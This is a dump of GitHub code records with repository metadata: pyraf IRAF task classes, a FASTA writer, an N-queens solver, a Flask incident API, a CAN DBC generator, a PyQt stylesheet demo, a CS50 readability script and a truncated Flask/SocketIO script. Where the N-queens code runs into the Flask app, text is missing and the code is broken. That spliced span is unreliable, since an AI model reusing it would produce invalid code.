pkgname,\n pkgbinary)\n if self.getForeign():\n raise IrafError(f\"CL task `{self.getName()}' cannot be foreign \"\n f\"(filename=`{filename}')\")\n # placeholder for Python translation of CL code\n # (lazy instantiation)\n self.__dict__['_pycode'] = None\n self.__dict__['_codeObject'] = None\n self.__dict__['_clFunction'] = None\n if fh is not None:\n # if filehandle was specified, go ahead and do the\n # initialization now\n self.initTask(filehandle=fh)\n\n # =========================================================\n # new public methods for CL task\n # =========================================================\n\n def getCode(self):\n \"\"\"Return a string with the Python code for this task\"\"\"\n self.initTask(force=1)\n return self._pycode.code\n\n def reCompile(self):\n \"\"\"Force recompilation of CL code\"\"\"\n if self._pycode is not None:\n self._pycode.index = None\n cl2py.codeCache.remove(self)\n self.initTask(force=1)\n\n # =========================================================\n # other public methods\n # =========================================================\n\n def initTask(self, force=0, filehandle=None):\n \"\"\"Fill in full pathnames of files, read par file, compile CL code\n\n If filehandle is specified, reads CL code from there\n \"\"\"\n\n if (not force) and (self._pycode is not None):\n # quick return if recheck of source code is not forced\n return\n\n if self._filename is None and filehandle is None and \\\n self._pycode is not None:\n # another quick return -- if filename and filehandle are\n # both None and pycode is defined, input must have come\n # from a filehandle. 
Then pycode does not need to be\n # recreated (and in fact, it cannot be recreated.)\n return\n\n if filehandle is not None and self._filename:\n self._fullpath = iraf.Expand(self._filename)\n\n IrafTask.initTask(self)\n\n if filehandle is None:\n filehandle = self._fullpath or self._filename\n\n if not cl2py.checkCache(filehandle, self._pycode):\n # File has changed, force recompilation\n self._pycode = None\n if Verbose > 1:\n print(\"Cached version out-of-date: \" + self._name,\n file=sys.stderr)\n\n if self._pycode is None:\n # translate code to python\n if Verbose > 1:\n print(\"Compiling CL task \",\n self._name,\n id(self),\n file=sys.stderr)\n self._codeObject = None\n self._pycode = cl2py.cl2py(filehandle,\n parlist=self._defaultParList,\n parfile=self._defaultParpath)\n\n if self._codeObject is None:\n # No code object, which can happen if function has not\n # been compiled or if compilation failed. Try compiling\n # again in any case.\n self._clFunction = None\n if self._pkgname:\n scriptname = f'<CL script {self._pkgname}.{self._name}>'\n else:\n # null pkgname -- just use task in name\n scriptname = f'<CL script {self._name}>'\n # force compile to inherit future div. so we don't rely on 2.x div.\n self._codeObject = compile(self._pycode.code, scriptname, 'exec',\n 0, 0)\n\n if self._clFunction is None:\n # Execute the code to define the Python function in clDict\n clDict = {}\n exec(self._codeObject, clDict)\n self._clFunction = clDict[self._pycode.vars.proc_name]\n\n # get parameter list from CL code\n # This may replace an existing list -- that's OK since\n # the cl2py code has already checked it for consistency.\n self._defaultParList = self._pycode.vars.parList\n # use currentParList from .par file if exists and consistent\n if self._currentParpath:\n if not self._defaultParList.isConsistent(self._currentParList):\n sys.stderr.write(\n f\"uparm parameter list `{self._currentParpath}' \"\n \"inconsistent with default parameters for \"\n f\"{self.__class__.__name__} `{self._name}'\\n\")\n sys.stderr.flush()\n # XXX just toss it for now -- later can try to merge new,old\n if self._currentParpath == self._scrunchParpath:\n try:\n os.remove(iraf.Expand(self._scrunchParpath,\n noerror=1))\n except OSError:\n pass\n self._currentParpath = self._defaultParpath\n self._currentParList = copy.deepcopy(self._defaultParList)\n else:\n self._currentParList = copy.deepcopy(self._pycode.vars.parList)\n self._currentParpath = self._defaultParpath\n\n # =========================================================\n # special methods\n # =========================================================\n\n def __getstate__(self):\n \"\"\"Return state for pickling\"\"\"\n # Dictionary is OK except for function pointer\n # Note that __setstate__ is not needed because\n # returned state is a dictionary\n if self._clFunction is None:\n return self.__dict__\n # replace _clFunction in shallow copy of dictionary\n sdict = self.__dict__.copy()\n sdict['_clFunction'] = None\n return sdict\n\n # =========================================================\n # private methods\n # =========================================================\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection\"\"\"\n return iraf.redirApply(redirKW)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n self._runCode()\n\n def _runCode(self, parList=None, kw={}):\n \"\"\"Run the procedure with current parameters\"\"\"\n # add the searchable task object to keywords\n kw['taskObj'] = ParDictListSearch(self)\n if parList is 
None:\n parList = self.getParList()\n # XXX\n # It might be better to pass all parameters as\n # keywords instead of as positional arguments?\n # That would be more robust against some errors\n # but would also not allow certain IRAF-like\n # behaviors (where the .par file gives a different\n # name for the parameter.)\n # XXX\n self._clFunction(*parList, **kw)\n\n def _noParFile(self):\n \"\"\"Decide what to do if .par file is not found\"\"\"\n # For CL tasks, it is OK if no .par\n pass\n\n def _isConsistentPar(self):\n \"\"\"Check current par list and default par list for consistency\"\"\"\n # they do not have to be consistent for CL task (at least not\n # where this is called, in IrafTask.initTask).\n # XXX This is a bit lax, eh? Need something a bit stricter.\n return 1\n\n\n def isConsistent(self, other):\n \"\"\"Returns true if this task is consistent with another task object\"\"\"\n if self.getFilename() is not None or other.getFilename() is not None:\n return IrafTask.isConsistent(self, other)\n else:\n return self._pycode == other._pycode\n\n# -----------------------------------------------------\n# IRAF package class\n# -----------------------------------------------------\n\n# use empty \"tag\" class from irafglobals as base class\n\n\nclass IrafPkg(IrafCLTask, irafglobals.IrafPkg):\n \"\"\"IRAF package class (special case of IRAF task)\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n IrafCLTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n self._loaded = 0\n self._tasks = minmatch.MinMatchDict()\n self._subtasks = minmatch.MinMatchDict()\n self._pkgs = minmatch.MinMatchDict()\n\n # =========================================================\n # new public methods for package\n # =========================================================\n\n def __str__(self):\n \"\"\" Describe this object. 
\"\"\"\n retval = \"IrafPkg: name=\"+self.getName()+\", pkg=\"+self.getPkgname()+ \\\n \", file=\"+self.getFilename()+\"\\n\"\n retval += \"tasks: \" + str(self._tasks) + \"\\n\"\n retval += \"subtasks: \" + str(self._subtasks) + \"\\n\"\n retval += \"packages: \" + str(self._pkgs) + \"\\n\"\n return retval\n\n def isLoaded(self):\n \"\"\"Returns true if this package has already been loaded\"\"\"\n return self._loaded\n\n def addTask(self, task, fullname):\n \"\"\"Add a task to the task list for this package\n\n Just store the name of the task to avoid cycles\n \"\"\"\n name = task.getName()\n self._tasks.add(name, fullname)\n # sub-packages get added to a separate list\n if isinstance(task, IrafPkg):\n self._pkgs.add(name, name)\n\n # =========================================================\n # other public methods\n # =========================================================\n\n def getAllMatches(self, name, triedpkgs=None):\n \"\"\"Return list of names of all parameters/tasks that may match name\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n matches = plist.getAllMatches(name)\n else:\n matches = []\n if self._loaded:\n # tasks in this package\n if name == \"\":\n matches.extend(list(self._tasks.keys()))\n else:\n matches.extend(self._tasks.getallkeys(name, []))\n # tasks in subpackages\n if not triedpkgs:\n triedpkgs = {}\n triedpkgs[id(self)] = 1\n getPkg = iraf.getPkg\n getTried = triedpkgs.get\n for fullname in self._pkgs.values():\n p = getPkg(fullname)\n if p._loaded and (not getTried(id(p))):\n try:\n matches.extend(\n p.getAllMatches(name, triedpkgs=triedpkgs))\n except AttributeError:\n pass\n return matches\n\n def unlearn(self):\n \"\"\"Resets parameters for all tasks in the package to their default values\"\"\"\n # If package isn't loaded, just unlearn the top-level package parameters,\n # otherwise unlearn top-level ones AND all sub tasks.\n IrafCLTask.unlearn(self)\n if self._loaded:\n # Loop over all tasks in the package\n for task in self._tasks.keys():\n iraf.getTask(task).unlearn()\n\n def __getattr__(self, name):\n \"\"\"Return the task or param 'name' from this package (if it exists).\"\"\"\n if name[:1] == '_':\n raise AttributeError(name)\n self.initTask()\n # return package parameter if it exists\n plist = self._runningParList or self._currentParList\n if plist and plist.hasPar(name):\n return plist.getValue(name, native=1, mode=self.getMode())\n # else search for task with the given name\n if not self._loaded:\n raise AttributeError(\"Package \" + self.getName() +\n \" has not been loaded; no tasks are defined\")\n fullname = self._getTaskFullname(name)\n if fullname:\n return iraf.getTask(fullname)\n else:\n raise AttributeError(f\"Parameter {name} not found\")\n\n # =========================================================\n # private methods\n # =========================================================\n\n def _getTaskFullname(self, name, triedpkgs=None):\n \"\"\"Return the full name (pkg.task) of task 'name' from this package\n\n Returns None if task is not found.\n\n Also searches subpackages for the task. triedpkgs is\n a dictionary with all the packages that have already been\n tried. 
It is used to avoid infinite recursion when\n packages contain themselves.\n\n Tasks that are found are added to _tasks dictionary to speed\n repeated searches.\n \"\"\"\n if not self._loaded:\n return None\n task = self._tasks.get(name)\n if task:\n return task\n # try subpackages\n task = self._subtasks.get(name)\n if task:\n return task\n # search subpackages\n if not triedpkgs:\n triedpkgs = {}\n triedpkgs[id(self)] = 1\n getPkg = iraf.getPkg\n getTried = triedpkgs.get\n for fullname in self._pkgs.values():\n p = getPkg(fullname)\n if p._loaded and (not getTried(id(p))):\n task = p._getTaskFullname(name, triedpkgs=triedpkgs)\n if task:\n self._subtasks.add(name, task)\n return task\n return None\n\n def _specialKW(self, kw):\n \"\"\"Handle special _doprint, _hush keywords\"\"\"\n\n # Special _hush keyword is used to suppress most output when loading\n # packages. Default is to print output.\n # Implement by redirecting stdout to /dev/null (but don't override\n # other redirection requests)\n if '_hush' in kw:\n if kw['_hush'] and \\\n not (('Stdout' in kw) or ('StdoutAppend' in kw)):\n kw['Stdout'] = '/dev/null'\n del kw['_hush']\n # Special _doprint keyword is used to control whether tasks are listed\n # after package has been loaded. Default is to list them if cl.menus\n # is set, or not to list them if it is not set.\n if '_doprint' in kw:\n doprint = kw['_doprint']\n del kw['_doprint']\n else:\n doprint = iraf.cl.menus\n return {'doprint': doprint}\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n doprint = specialKW['doprint']\n # if already loaded, just add to iraf.loadedPath\n iraf.loadedPath.append(self)\n if not self._loaded:\n self._loaded = 1\n iraf.addLoaded(self)\n if Verbose > 1:\n print(\"Loading pkg: \" + self.getName() + \"(\" +\n self.getFullpath() + \")\",\n file=sys.stderr)\n menus = iraf.cl.menus\n try:\n iraf.cl.menus = 0\n self._runCode()\n # if other packages were loaded, put this on the\n # loadedPath list one more time\n if iraf.loadedPath[-1] is not self:\n iraf.loadedPath.append(self)\n if doprint:\n iraf.listTasks(self)\n finally:\n iraf.cl.menus = menus\n\n # -----------------------------------------------------\n # Turn an IrafCLTask into an IrafPkg\n # This is necessary because sometimes package scripts\n # are incorrectly defined as simple CL tasks. (Currently\n # the only example I know of is the imred/ccdred/ccdtest\n # package, but there could be others.) Need to keep\n # the same object (because there may be multiple references\n # to it) but repair the mistake by changing its class.\n #\n # A bit scary, but it works (at least in the current version\n # of Python.)\n #\n # This doesn't do everything that might be necessary. E.g., it does\n # not print the package contents after loading and does not put the\n # package on the list of loaded packages. 
Leave that up to the calling\n # routine.\n # -----------------------------------------------------\n\n\ndef mutateCLTask2Pkg(o, loaded=1, klass=IrafPkg):\n \"\"\"Hack an IRAF CL task object into an IRAF package object\"\"\"\n\n if isinstance(o, IrafPkg):\n return\n if not isinstance(o, IrafCLTask):\n raise TypeError(f\"Cannot turn object `{repr(o)}' into an IrafPkg\")\n\n # add the extra attributes used in IrafPkg\n # this is usually called while actually loading the package, so by\n # default loaded flag is set to true\n o._loaded = loaded\n o._tasks = minmatch.MinMatchDict()\n o._pkgs = minmatch.MinMatchDict()\n\n # Presto, you're an IrafPkg!\n o.__class__ = klass\n\n\n# -----------------------------------------------------\n# IRAF foreign task class\n# -----------------------------------------------------\n\n# regular expressions for parameter substitution\n_re_foreign_par = re.compile(r'\\$' + r'((?P<n>[0-9]+)' + r'|(?P<all>\\*)' +\n r'|(\\((?P<paren>[0-9]+)\\))' +\n r'|(\\((?P<allparen>\\*)\\))' + r')')\n\n\nclass IrafForeignTask(IrafTask):\n \"\"\"IRAF foreign task class\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n # check that parameters are consistent with foreign task:\n # - foreign flag set\n # - no parameter file\n if not self.getForeign():\n raise IrafError(f\"Bad filename for foreign task {self.getName()}: \"\n f\"{filename}\")\n if self.hasParfile():\n if Verbose > 0:\n print(\"Foreign task \" + self.getName() +\n \" cannot have a parameter file\",\n file=sys.stderr)\n self._hasparfile = 0\n\n def setParList(self, *args, **kw):\n \"\"\"Set arguments to task\n\n Does not use IrafParList structure -- just keeps list of\n the arguments\n \"\"\"\n if '_setMode' in kw:\n del kw['_setMode']\n if len(kw) > 0:\n raise ValueError(f'Illegal keyword parameters {list(kw.keys())} '\n f'for task {self._name}')\n # self._args = args\n # Ensure that all arguments passed to ForeignTasks are\n # converted to strings, including objects which are not\n # naturally converted to strings.\n # self._args = map(re.escape,map(str,args))\n self._args = list(map(self._str_escape, args))\n\n # =========================================================\n # private methods\n # =========================================================\n def _str_escape(self, arg):\n if not isinstance(arg, str):\n _arg = re.escape(str(arg))\n else:\n _arg = arg\n return _arg\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection\"\"\"\n return iraf.redirApply(redirKW)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n args = self._args\n self._nsub = 0\n # create command line\n cmdline = _re_foreign_par.sub(self._parSub, self._filename)\n if self._nsub == 0 and args:\n # no argument substitution, just append all args\n cmdline = cmdline + ' ' + ' '.join(args)\n if Verbose > 1:\n print(\"Running foreign task: \" + cmdline, file=sys.stderr)\n # create and run the sub-process\n subproc.subshellRedir(cmdline)\n\n def _parSub(self, mo):\n \"\"\"Substitute an argument for this match object\"\"\"\n self._nsub = self._nsub + 1\n n = mo.group('n')\n if n is not None:\n # $n -- simple substitution\n n = int(n)\n if n > len(self._args):\n return ''\n elif n == 0:\n return self._name\n else:\n return self._args[n - 1]\n n = mo.group('paren')\n if n is not None:\n # $(n) -- expand IRAF virtual filenames\n n = int(n)\n if n > len(self._args):\n return ''\n elif n == 0:\n 
return self._name\n else:\n return iraf.Expand(self._args[n - 1])\n n = mo.group('all')\n if n is not None:\n # $* -- append all arguments\n return ' '.join(self._args)\n n = mo.group('allparen')\n if n is not None:\n # $(*) -- append all arguments with virtual filenames converted\n return ' '.join(map(iraf.Expand, self._args))\n raise IrafError(f\"Cannot handle foreign string `{self._filename}' \"\n f\"for task {self._name}\")\n\n\n# -----------------------------------------------------\n# Utility function to split qualified names into components\n# -----------------------------------------------------\n\n\ndef _splitName(qualifiedName):\n \"\"\"Split qualifiedName into components.\n\n qualifiedName looks like [[package.]task.]paramname[subscript][.field],\n where subscript is an index in brackets. Returns a tuple with\n (package, task, paramname, subscript, field). IRAF one-based subscript\n is changed to Python zero-based subscript.\n \"\"\"\n # name components may have had 'PY' appended if they match Python keywords\n slist = list(map(irafutils.untranslateName, qualifiedName.split('.')))\n\n # add field=None if not present\n\n if len(slist) == 1 or not basicpar.isParField(slist[-1]):\n # no field\n slist.append(None)\n if len(slist) > 4:\n raise IrafError(\"Illegal syntax for parameter: \" + qualifiedName)\n slist = [None] * (4 - len(slist)) + slist\n\n # parse possible subscript and insert into list\n\n paramname = slist[2]\n pstart = paramname.find('[')\n if pstart >= 0:\n try:\n pend = paramname.rindex(']')\n pindex = int(paramname[pstart + 1:pend]) - 1\n slist[2:3] = [paramname[:pstart], pindex]\n except (TypeError, ValueError):\n raise IrafError(\"Illegal syntax for array parameter: \" +\n qualifiedName)\n else:\n slist[3:3] = [None]\n return slist\n\n\n#\n# When a user has a problem, I often wonder where the task they are\n# using came from and how it is defined. This set of tools shows a\n# hierarchy of the task/package definitions that led us here.\n#\n# (I would also like to know what file contained the task definition, but\n# that information is not available)\n#\n# This is used by the task \"taskinfo\" in iraffunctions.py; there is some\n# user documentation there.\n#\n\n\n# find all the task definitions that match a particular wildcard\ndef gettask(name):\n return [x for x in all_task_definitions if fnmatch.fnmatch(x._name, name)]\n\n\n# make a printable line about a single task object - this doesn't say everything,\n# but it may say enough without being too cluttered.\ndef printable_task_def(x):\n cl = str(x.__class__)\n if '.' in cl:\n cl = cl.split('.')[-1]\n\n # I wonder if there is a significance to using getFullpath instead of _filename\n\n s = f\"{x._name} : {x.getFullpath()} - pkgbinary={x._pkgbinary} class={cl}\"\n return s\n\n\n# show a task line, then show the package that task may have come from, then where\n# that came from, and so on. 
The top level is normally \"clpackage\" which is its\n# own parent.\ndef showtasklong(name, level=0):\n l = gettask(name)\n if len(l) < 1:\n print((\" \" * level) + f'{name} : NOT FOUND')\n else:\n l.sort()\n for x in l:\n print((\" \" * level) + printable_task_def(x))\n next_name = x._pkgname\n if (next_name == name) or (level > 15):\n pass\n else:\n showtasklong(next_name, level=level + 1)\n","repo_name":"iraf-community/pyraf","sub_path":"pyraf/iraftask.py","file_name":"iraftask.py","file_ext":"py","file_size_in_byte":76010,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"73689838542","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals, generators, nested_scopes, with_statement)\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii,\n chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\nimport re\nimport os\n\n#=========================================================================\n# Attributes:\n# width\n# Methods:\n# FastaWriter()\n# Instance Methods:\n# writer=FastaWriter(optionalWidth)\n# writer.writeFasta(defline,sequence,filename)\n# writer.appendToFasta(defline,sequence,filename)\n# writer.addToFasta(defline,sequence,filehandle)\n#=========================================================================\nclass FastaWriter:\n \"\"\"FastaWriter\"\"\"\n def __init__(self,width=60):\n self.width=width\n\n def writeFasta(self,defline,seq,filename):\n with open(filename,\"w\") as fh:\n self.addToFasta(defline,seq,fh)\n \n def addToFasta(self,defline,seq,fh):\n defline=defline.rstrip()\n if(not re.search(\"^\\\s*>\",defline)): defline=\">\"+defline\n fh.write(defline+\"\\n\");\n length=len(seq)\n numLines=length//self.width\n if(length%self.width>0): numLines+=1\n start=0\n for i in range(0,numLines):\n line=seq[start:start+self.width]\n fh.write(line+\"\\n\")\n start+=self.width\n if(length==0): fh.write(\"\\n\")\n\n def appendToFasta(self,defline,seq,filename):\n if(not os.path.exists(filename)):\n self.writeFasta(defline,seq,filename)\n return\n with open(filename,\"a\") as fh:\n self.addToFasta(defline,seq,fh)\n\n\n","repo_name":"bmajoros/python","sub_path":"FastaWriter.py","file_name":"FastaWriter.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9578294914","text":"def place(row,column,n):\n if(row==0):\n return True\n for k in range(row):\n if(l[k][column]==1):\n return False\n h=row\n j=column\n while(h>0 and j>0):\n h=h-1\n j=j-1\n if(l[h][j]):\n return False\n h=row\n j=column\n while(h0 and j хеш\"\"\"\n return {'hash': bd.add_data(request.headers, request.json)}\n\n\n@app.route('/find', methods=['POST'])\ndef find():\n \"\"\"Search by header or body -> data\"\"\"\n return {'data': bd.get_data(request.json)}\n\n\n@app.route('/find2', methods=['GET'])\ndef find2():\n \"\"\"Get all records by hash -> data\"\"\"\n try:\n data = bd.get_data_by_hash(request.args.get('h'))\n return {'data': data}\n except ValueError:\n return {'Error': 'Invalid hash type'}\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"Yogel9/incidents_collector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30980284694","text":"from dataclasses import asdict\nfrom 
packet import Packet\n\n\nclass DBC:\n\n # if provided filepath, load DBC tree structure from path\n def __init__(self, filepath=None, packets=None, ecu_packets=None):\n if packets is not None:\n self.packets = packets\n self.bus_ids = set()\n self.ecu_packets = ecu_packets\n for packet in packets:\n self.bus_ids.add(packet.bus_id)\n return\n\n self.packets = [] # packet list\n self.bus_ids = set()\n if filepath is not None:\n pass\n\n @classmethod\n def from_packets_list(cls, packets_data: list, ecu_packets: str) -> \"DBC\":\n packets = []\n for data in packets_data:\n packet = Packet.from_dict(data)\n packets.append(packet)\n\n return cls(packets=packets, ecu_packets=ecu_packets)\n\n def to_dict(self):\n data = {\"packet\": []}\n\n for packet in self.packets:\n data[\"packet\"].append(asdict(packet))\n\n return {\"file\": [data]}\n\n def add_packet(self, packet):\n \"\"\"\n Add packet to dbc\n \"\"\"\n self.bus_ids.add(packet.bus_id)\n self.packets.append(packet)\n\n def is_valid(self):\n \"\"\"\n Determine if this is a valid dbc\n \"\"\"\n pass # we don't have invalid dbcs. duh\n\n def __repr__(self):\n \"\"\"\n Custom string representation\n \"\"\"\n packet_strs = []\n for packet in self.packets:\n packet_strs.append(str(packet))\n\n return \"\"\"VERSION \"\"\n\n\nNS_ : \n\tNS_DESC_\n\tCM_\n\tBA_DEF_\n\tBA_\n\tVAL_\n\tCAT_DEF_\n\tCAT_\n\tFILTER\n\tBA_DEF_DEF_\n\tEV_DATA_\n\tENVVAR_DATA_\n\tSGTYPE_\n\tSGTYPE_VAL_\n\tBA_DEF_SGTYPE_\n\tBA_SGTYPE_\n\tSIG_TYPE_REF_\n\tVAL_TABLE_\n\tSIG_GROUP_\n\tSIG_VALTYPE_\n\tSIGTYPE_VALTYPE_\n\tBO_TX_BU_\n\tBA_DEF_REL_\n\tBA_REL_\n\tBA_DEF_DEF_REL_\n\tBU_SG_REL_\n\tBU_EV_REL_\n\tBU_BO_REL_\n\tSG_MUL_VAL_\n\nBS_:\n\nBU_: {bus_ids}\n\n{packets}\n\n{ecu_packets}\n\n\nBA_DEF_ BU_ \"TpNodeBaseAddress\" HEX 0 65535;\nBA_DEF_ BO_ \"GenMsgSendType\" STRING ;\nBA_DEF_ \"ProtocolType\" STRING ;\nBA_DEF_ \"NmType\" STRING ;\nBA_DEF_ BO_ \"GenMsgCycleTime\" INT 1 10000;\nBA_DEF_ BO_ \"GenMsgILSupport\" ENUM \"No\",\"Yes\";\nBA_DEF_ BU_ \"ILUsed\" ENUM \"No\",\"Yes\";\nBA_DEF_ \"VersionNumber\" INT 0 10000;\nBA_DEF_ \"VersionDay\" INT 1 31;\nBA_DEF_ \"VersionMonth\" INT 1 12;\nBA_DEF_ \"VersionYear\" INT 2016 3000;\nBA_DEF_ \"BusType\" STRING ;\nBA_DEF_ BO_ \"DBC_Author_Contact\" STRING ;\nBA_DEF_DEF_ \"DBC_Author_Contact\" \"CANbusInfo@AEMelectronics.com\";\nBA_DEF_DEF_ \"TpNodeBaseAddress\" 0;\nBA_DEF_DEF_ \"GenMsgSendType\" \"Cyclic\";\nBA_DEF_DEF_ \"ProtocolType\" \"\";\nBA_DEF_DEF_ \"NmType\" \"\";\nBA_DEF_DEF_ \"GenMsgCycleTime\" 20;\nBA_DEF_DEF_ \"GenMsgILSupport\" \"Yes\";\nBA_DEF_DEF_ \"ILUsed\" \"Yes\";\nBA_DEF_DEF_ \"VersionNumber\" 0;\nBA_DEF_DEF_ \"VersionDay\" 1;\nBA_DEF_DEF_ \"VersionMonth\" 1;\nBA_DEF_DEF_ \"VersionYear\" 2016;\nBA_DEF_DEF_ \"BusType\" \"Can\";\nBA_ \"ProtocolType\" \"AEM Net\";\nBA_ \"NmType\" \"AEM Net\";\nBA_ \"VersionNumber\" 3;\nBA_ \"VersionDay\" 28;\nBA_ \"VersionMonth\" 11;\nBA_ \"BusType\" \"CAN\";\nBA_ \"GenMsgCycleTime\" BO_ 2180030470 50;\nBA_ \"GenMsgCycleTime\" BO_ 2180030466 16;\nBA_ \"GenMsgCycleTime\" BO_ 2180030465 16;\nBA_ \"GenMsgCycleTime\" BO_ 2180030464 16;\n\n\"\"\".format(\n bus_ids=\" \".join(self.bus_ids), packets=\"\\n\\n\".join(packet_strs), ecu_packets=self.ecu_packets\n )\n","repo_name":"WURacing/dbc_generator","sub_path":"dbc_generator/dbc.py","file_name":"dbc.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"9340996565","text":"import sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import 
*\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.setWindowTitle(\"Styled PushButton\")\n self.setGeometry(50, 50, 500, 300)\n layout = QGridLayout()\n self.setLayout(layout)\n\n default = QPushButton(\"Default\")\n flat = QPushButton(\"Flat\")\n flat.setFlat(True)\n styled = QPushButton(\"Styled\")\n styled.setObjectName(\"styled\")\n\n layout.addWidget(default, 0, 0)\n layout.addWidget(flat, 0, 1)\n layout.addWidget(styled, 1, 0)\n self.stylesheet()\n\n def stylesheet(self):\n \tcss = \"\"\"\n \t\tQPushButton {\n \t\t\tmin-height: 2em;\n \t\t\tfont: bold 18px;\n \t\t}\n \t\tQPushButton#styled {\n \t\t\tbackground-color: #32e1e3;\n \t\t\tcolor: black;\n \t\t\tborder-style: outset;\n \t\t\tborder-width: 1px;\n \t\t\tborder-color: #43e2e4;\n \t\t\tborder-radius: 20px;\n \t\t\tpadding: 6px;\n \t\t}\n \t\tQPushButton#styled:hover {\n \t\t\tbackground-color:#4455e8;\n \t\t\tcolor: white;\n \t\t}\n \t\tQPushButton#styled:pressed {\n \t\t\tbackground-color:#99e5e8;\n \t\t\tcolor: white;\n \t\t}\n \t\"\"\"\n \tself.setStyleSheet(css)\n\n\napp = QApplication(sys.argv)\n\n\ndef main():\n window = Window()\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shoukreytom/Python","sub_path":"gui/pyqt/stylesheet/PushButton.py","file_name":"PushButton.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17183040518","text":"from cs50 import get_string\n\npunctuation = ['.', '!', '?']\n\ntext = get_string(\"Text: \").split()\n\nwords = len(text)\nletters = 0\nsentences = 0\n\nfor word in text:\n for char in word:\n if char.isalpha():\n letters += 1\n if word[-1] in punctuation:\n sentences += 1\n\ngrade = int(round(((5.88 * letters - 29.6 * sentences) / words) - 15.8))\nif grade < 1:\n print(\"Before Grade 1\")\nelif grade > 15:\n print(\"Grade 16+\")\nelse:\n print(\"Grade \", grade)\n","repo_name":"Andrew-CC-Martin/cs50-psets","sub_path":"pset6/readability/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"15896854681","text":"#!/usr/bin/env python\nimport os, os.path\nimport win32com.client\nimport sqlite3\nimport threading\nimport numpy as np\nimport selenium.webdriver.chrome.service as service\nimport time\nimport psutil\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport sys\nimport csv\nimport subprocess\nimport getpass\nimport ctypes\nfrom PIL import Image\nfrom numpy import genfromtxt\nfrom sklearn import datasets, svm, metrics\nfrom subprocess import Popen\nfrom threading import Lock\nfrom flask import Flask, render_template, session, request, redirect, url_for\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room, close_room, rooms, disconnect\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom threading import Thread\nfrom multiprocessing import Process\n\n\ntemploop = 0\ntempcount = 1\nresultimg = \"\"\nCustomer_ID = \"\"\nSurname = \"\"\nFirst_Name = \"\"\nOther_Names = \"\"\nTitle = \"\"\nsuffix = \"\"\nSalutation = \"\"\nGender = \"\"\nDeceased_Date = \"\"\nDate_of_Birth = \"\"\nCountry_of_birth = \"\"\nPlace_of_Birth = \"\"\nTax_Residence1 = \"\"\nTax_Residence2 = \"\"\nTax_Residence3 = \"\"\nTax_Residence4 = \"\"\nTax_Residence5 = \"\"\nTax_Residence6 = 
\"\"\nTax_Residence7 = \"\"\nTax_Residence8 = \"\"\nTax_Residence9 = \"\"\nTax_Residence10 = \"\"\nTax_Reference_no_1 = \"\"\nTax_Reference_no_2 = \"\"\nTax_Reference_no_3 = \"\"\nTax_Reference_no_4 = \"\"\nTax_Reference_no_5 = \"\"\nTax_Reference_no_6 = \"\"\nTax_Reference_no_7 = \"\"\nTax_Reference_no_8 = \"\"\nTax_Reference_no_9 = \"\"\nTax_Reference_no_10 = \"\"\npermanet_add_1 = \"\"\npermanet_add_2 = \"\"\npermanet_add_3 = \"\"\npermanet_add_4 = \"\"\npermanet_add_5 = \"\"\nPostCode = \"\"\nCountry_of_Residence = \"\"\nHome_No = \"\"\nBusiness_No = \"\"\nMobile_No = \"\"\nEmail_Add = \"\"\nNanpa_Country_Home = \"\"\nNanpa_Code_Home = \"\"\nNanpa_Country_Bus = \"\"\nNanpa_Code_Bus = \"\"\nNanpa_Country_Mob = \"\"\nNanpa_Code_Mob = \"\"\nTax_Reference_no_1 = \"\"\nTax_Reference_no_2 = \"\"\nTax_Reference_no_3 = \"\"\nTax_Reference_no_4 = \"\"\nTax_Reference_no_5 = \"\"\nTax_Reference_no_6 = \"\"\nTax_Reference_no_7 = \"\"\nTax_Reference_no_8 = \"\"\nTax_Reference_no_9 = \"\"\nTax_Reference_no_10 = \"\"\nthreadflag = 0\ncaseref = \"\"\nglobalfilename = \"\"\nvalstatus = \"0%\"\nvalstatustitle = \"\"\nasync_mode = None\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\n#async_mode = \"eventlet\"\nsocketio = SocketIO(app, async_mode=async_mode)\n#thread = None\n#thread_lock = Lock()\n\napp.debug=True\n\ntempsplit = \"\"\n\n\n@app.route('/')\ndef index():\n return render_template('indextesting.html', async_mode=socketio.async_mode)\n\n\n@socketio.on('my_event', namespace='/test')\ndef test_message(message):\n global tempsplit\n global temploop\n print(\"my-event 